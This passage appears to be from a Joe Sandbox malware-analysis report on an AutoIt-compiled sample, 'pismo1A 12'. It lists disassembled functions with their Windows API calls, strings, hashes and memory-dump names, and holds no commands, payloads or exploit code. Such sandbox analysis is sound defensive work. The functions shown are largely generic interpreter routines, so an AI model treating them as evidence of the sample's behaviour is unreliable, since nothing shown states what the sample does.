Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: b82958c1f5fb7b3bb34641a6220f3a3bd56b2124129a169983337290c9ba94fc
Instruction ID: 93af6fac0452ac9947967806cafcbc584c1abe5db4f6517ccd04526f69b2f437
Opcode Fuzzy Hash: b82958c1f5fb7b3bb34641a6220f3a3bd56b2124129a169983337290c9ba94fc
Instruction Fuzzy Hash: D761D072500319BAFB55DF64CC45BBE77A8FB08721F108609F815E61D2DF78A990CBA0

Function 006A7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

", xrefs: 006E5153
#cs, xrefs: 006A7873, 006A78C5
#include-once, xrefs: 006A782F
#include, xrefs: 006A7847
#comments-start, xrefs: 006A785F, 006A78B1
#comments-end, xrefs: 006A78D9
#requireadmin, xrefs: 006A77FF
#notrayicon, xrefs: 006A77E7
', xrefs: 006E5169
#pragma compile, xrefs: 006A77D3
#OnAutoItStartRegister, xrefs: 006A7817
#ce, xrefs: 006A78ED
Bad directive syntax error, xrefs: 006E519A
Unterminated group of comments, xrefs: 006E528C
Cannot parse #include, xrefs: 006E5279

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: cf574a3093fff737d8502cf9034770ed7d07edb3cfa1ddc2b15b3048c0b3fc5f
Instruction ID: 87259439f749ad4c0a8581032308e032f561c606caaf20caaddf78310c2a2305
Opcode Fuzzy Hash: cf574a3093fff737d8502cf9034770ed7d07edb3cfa1ddc2b15b3048c0b3fc5f
Instruction Fuzzy Hash: 8E81D8B1604205BBDB60BF60DC42FEE776AAF16340F044028F9056B292EB74DE51DBA5

Function 00705A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00705A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00705A40
SetWindowTextW.USER32(?,?), ref: 00705A57
GetDlgItem.USER32(?,000003EA), ref: 00705A6C
SetWindowTextW.USER32(00000000,?), ref: 00705A72
GetDlgItem.USER32(?,000003E9), ref: 00705A82
SetWindowTextW.USER32(00000000,?), ref: 00705A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00705AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00705AC3
GetWindowRect.USER32(?,?), ref: 00705ACC
_wcslen.LIBCMT ref: 00705B33
SetWindowTextW.USER32(?,?), ref: 00705B6F
GetDesktopWindow.USER32 ref: 00705B75
GetWindowRect.USER32(00000000), ref: 00705B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00705BD3
GetClientRect.USER32(?,?), ref: 00705BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00705C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00705C2F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: df828fa8ca5c9b4e111704212d0a16451a8e7fc70675f2063b2a30fdb3801170
Instruction ID: a7f0ba0414fb6a3f4688a86c95b30b8bd3e4a9ad2168c8c53ef6906392fdf5c2
Opcode Fuzzy Hash: df828fa8ca5c9b4e111704212d0a16451a8e7fc70675f2063b2a30fdb3801170
Instruction Fuzzy Hash: 0A715B71A00B09EFDB21DFA8CE85AAFBBF5FB48705F104618E542A25A0D779B940CF54

Function 007030F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0070318D
_wcslen.LIBCMT ref: 007031F8

Strings

TEXT, xrefs: 0070347C
NAME, xrefs: 00703335, 00703346
REGEXPCLASS, xrefs: 00703255, 00703266
INSTANCE, xrefs: 00703453
[v, xrefs: 0070339A
CLASSNN, xrefs: 007031F3, 00703204
CLASS, xrefs: 00703188, 007031A5

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[v
API String ID: 176396367-1498973047
Opcode ID: fb489e9b30dd849892a0c80b4373a2a85e11cc6008e24a4b33c8e2e44711596e
Instruction ID: e35c36b1c591e27cd6ea6f392cc483afc7db6fff1509190a343fc575a3dd775c
Opcode Fuzzy Hash: fb489e9b30dd849892a0c80b4373a2a85e11cc6008e24a4b33c8e2e44711596e
Instruction Fuzzy Hash: 9EE1D431A00516DACB149F74C851AFDFBF9BF44710F54832AE456A7290DB38AE859B90

Function 006C00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 006C00C6

Part of subcall function 006C00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0077070C,00000FA0,E0206E59,?,?,?,?,006E23B3,000000FF), ref: 006C011C
Part of subcall function 006C00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006E23B3,000000FF), ref: 006C0127
Part of subcall function 006C00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006E23B3,000000FF), ref: 006C0138
Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 006C014E
Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 006C015C
Part of subcall function 006C00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 006C016A
Part of subcall function 006C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006C0195
Part of subcall function 006C00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 006C01A0

___scrt_fastfail.LIBCMT ref: 006C00E7

Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9

Strings

InitializeConditionVariable, xrefs: 006C0148
SleepConditionVariableCS, xrefs: 006C0154
kernel32.dll, xrefs: 006C0133
api-ms-win-core-synch-l1-2-0.dll, xrefs: 006C0122
WakeAllConditionVariable, xrefs: 006C0162

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: de8e0d18c4adf8cbd96e308e1dc757f7fc8c2869b34189eb5ea3da1bce9af615
Instruction ID: a5888ccc8a98820219cced45beddc8f1cd22cae52f6d8abac09b494e955979fb
Opcode Fuzzy Hash: de8e0d18c4adf8cbd96e308e1dc757f7fc8c2869b34189eb5ea3da1bce9af615
Instruction Fuzzy Hash: DB21DAB2B44710EBFB115BB4AC09F797395DB04B91F15412DF805A2691DB789C008BD8

Function 007144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0073CC08), ref: 00714527
_wcslen.LIBCMT ref: 0071453B
_wcslen.LIBCMT ref: 00714599
_wcslen.LIBCMT ref: 007145F4
_wcslen.LIBCMT ref: 0071463F
_wcslen.LIBCMT ref: 007146A7

Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD

GetDriveTypeW.KERNEL32(?,00766BF0,00000061), ref: 00714743

Strings

ramdisk, xrefs: 007146F1
fixed, xrefs: 00714635, 0071463A
unknown, xrefs: 00714708
cdrom, xrefs: 0071458F, 00714594
removable, xrefs: 007145EA, 007145EF
network, xrefs: 0071469D, 007146A2
all, xrefs: 00714531, 00714536

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 4058976ba6326a774c23d9c598769172a9a5ee85afaa9f618e49cb679fd98f63
Instruction ID: 7c8642b8ad8156410f609ff5ccaa7c26a51d639d55cb7a21dadd2c1e889e42dc
Opcode Fuzzy Hash: 4058976ba6326a774c23d9c598769172a9a5ee85afaa9f618e49cb679fd98f63
Instruction Fuzzy Hash: CDB1C1716083029FC710EF28C890AAAB7E6BF96764F50491DF496C72D1D738DD84CBA2

Function 0073911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

DragQueryPoint.SHELL32(?,?), ref: 00739147

Part of subcall function 00737674: ClientToScreen.USER32(?,?), ref: 0073769A
Part of subcall function 00737674: GetWindowRect.USER32(?,?), ref: 00737710
Part of subcall function 00737674: PtInRect.USER32(?,?,00738B89), ref: 00737720

SendMessageW.USER32(?,000000B0,?,?), ref: 007391B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007391BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007391DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00739225
SendMessageW.USER32(?,000000B0,?,?), ref: 0073923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00739255
SendMessageW.USER32(?,000000B1,?,?), ref: 00739277
DragFinish.SHELL32(?), ref: 0073927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00739371

Strings

@GUI_DRAGFILE, xrefs: 00739320
@GUI_DROPID, xrefs: 0073929E
@GUI_DRAGID, xrefs: 007392E9
p#w, xrefs: 007392BB

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#w
API String ID: 221274066-3190343874
Opcode ID: 19f6b90e85e8c3582d1e3b9042bbddf91286108dd5198c3f67ed1726035d427e
Instruction ID: 6a146d744b4a02d668d0a890b8ddb502a44986eb5701f0b23f5b94bb90e1f754
Opcode Fuzzy Hash: 19f6b90e85e8c3582d1e3b9042bbddf91286108dd5198c3f67ed1726035d427e
Instruction Fuzzy Hash: 7E618C71108300AFD701EF64CC85DAFBBE9EF89350F10492EF696921A1DB749A49CB66

Function 0072AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0072B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0072B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0072B1D4
_wcslen.LIBCMT ref: 0072B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0072B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0072B236
_wcslen.LIBCMT ref: 0072B332

Part of subcall function 007105A7: GetStdHandle.KERNEL32(000000F6), ref: 007105C6

_wcslen.LIBCMT ref: 0072B34B
_wcslen.LIBCMT ref: 0072B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0072B3B6
GetLastError.KERNEL32(00000000), ref: 0072B407
CloseHandle.KERNEL32(?), ref: 0072B439
CloseHandle.KERNEL32(00000000), ref: 0072B44A
CloseHandle.KERNEL32(00000000), ref: 0072B45C
CloseHandle.KERNEL32(00000000), ref: 0072B46E
CloseHandle.KERNEL32(?), ref: 0072B4E3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 914959354e98345568a28002a6ec7df29c5c0f3570abc57923bba641d00d8c9b
Instruction ID: 3be2db056e89eed85462b5b07c4df285fcc9a39665d66e3994962329bdf7d7ad
Opcode Fuzzy Hash: 914959354e98345568a28002a6ec7df29c5c0f3570abc57923bba641d00d8c9b
Instruction Fuzzy Hash: E5F1AB31604350DFC765EF24D891B6EBBE2AF85310F18855DF8999B2A2CB35EC40CB96

Function 006A326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00771990), ref: 006E2F8D
GetMenuItemCount.USER32(00771990), ref: 006E303D
GetCursorPos.USER32(?), ref: 006E3081
SetForegroundWindow.USER32(00000000), ref: 006E308A
TrackPopupMenuEx.USER32(00771990,00000000,?,00000000,00000000,00000000), ref: 006E309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006E30A9

Strings

0, xrefs: 006A327D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 4954cdd648fdd5a89199e29770ac3fe7c1823204f54856994302163231f550f0
Instruction ID: a35917a974580c276d3a451e2feb7ee5a3aa48f9d08ff189e56d33124a17e438
Opcode Fuzzy Hash: 4954cdd648fdd5a89199e29770ac3fe7c1823204f54856994302163231f550f0
Instruction Fuzzy Hash: 58710531641366BAFB219F25CC59FEABF6AFF01364F204206F5146A2E1C7B5AE50CB50

Function 00736CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00736DEB

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00736E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00736E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00736E94
DestroyWindow.USER32(?), ref: 00736EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,006A0000,00000000), ref: 00736EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00736EFD
GetDesktopWindow.USER32 ref: 00736F16
GetWindowRect.USER32(00000000), ref: 00736F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00736F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00736F4D

Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952

Strings

0, xrefs: 00736D98
tooltips_class32, xrefs: 00736E58, 00736EDD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 3d393c0c3979a1ab3f32dcaa74c82878fad0bb1cbbe772b77faebff255571e6a
Instruction ID: cbf19c50416f8eacd9768b6c7b1d15fbbcbb566ad5a2f01af6a3405c7af597fa
Opcode Fuzzy Hash: 3d393c0c3979a1ab3f32dcaa74c82878fad0bb1cbbe772b77faebff255571e6a
Instruction Fuzzy Hash: 06718CB0104241AFEB21CF18DC44F6ABBE9FB89304F44841DFA8997261C778E946CF25

Function 0071C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0071C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0071C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0071C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0071C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0071C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0071C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0071C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0071C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0071C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0071C5F0
InternetCloseHandle.WININET(00000000), ref: 0071C5FB

Strings

, xrefs: 0071C575

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 0b6aa25af4193ebeeb0f21235115f38f675d890097c8f47fb0bdbe1b5680cfbf
Instruction ID: a8c81926f7a46b35477e59bd5b25106e6e9514c512285e04fe0f483b4c416cdb
Opcode Fuzzy Hash: 0b6aa25af4193ebeeb0f21235115f38f675d890097c8f47fb0bdbe1b5680cfbf
Instruction Fuzzy Hash: EF5150B1540204BFEB228FA8C948ABB7BFDFF08755F108419F945D6290D738E994DB61

Function 0073856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00738592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007385F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0073FC38,?), ref: 00738611
GlobalFree.KERNEL32(00000000), ref: 00738621
GetObjectW.GDI32(?,00000018,?), ref: 00738641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00738671
DeleteObject.GDI32(?), ref: 00738699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007386AF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 4e89b7d81ed9a8cbf3bd941fc0cda1d7aec282c5a6f435173de335317d07bedb
Instruction ID: d16cf362492bb70a7ba612d8194945870ac004bf9c61d0dd4e9d71c026ba0872
Opcode Fuzzy Hash: 4e89b7d81ed9a8cbf3bd941fc0cda1d7aec282c5a6f435173de335317d07bedb
Instruction Fuzzy Hash: 91410D75600208EFEB119F65DC49EAB7BB8FF89711F108058F905E7251DB389D01DB65

Function 007114BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00711502
VariantCopy.OLEAUT32(?,?), ref: 0071150B
VariantClear.OLEAUT32(?), ref: 00711517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007115FB
VarR8FromDec.OLEAUT32(?,?), ref: 00711657
VariantInit.OLEAUT32(?), ref: 00711708
SysFreeString.OLEAUT32(?), ref: 0071178C
VariantClear.OLEAUT32(?), ref: 007117D8
VariantClear.OLEAUT32(?), ref: 007117E7
VariantInit.OLEAUT32(00000000), ref: 00711823

Strings

Default, xrefs: 007116AF
%4d%02d%02d%02d%02d%02d, xrefs: 00711625

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: ad11cc9dfbc98836521c5f0e9bf103072754b9284158d0a4ce4793e340a22376
Instruction ID: 48bf4f79321529e19f64ee4ed2a3ea28910128334877b782ec46e91cfe466b23
Opcode Fuzzy Hash: ad11cc9dfbc98836521c5f0e9bf103072754b9284158d0a4ce4793e340a22376
Instruction Fuzzy Hash: D3D10271A00115DBDB10AF68D885BFDB7B6BF45700F90815AE646AF2C0DB38ED90DB62

Function 0072B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

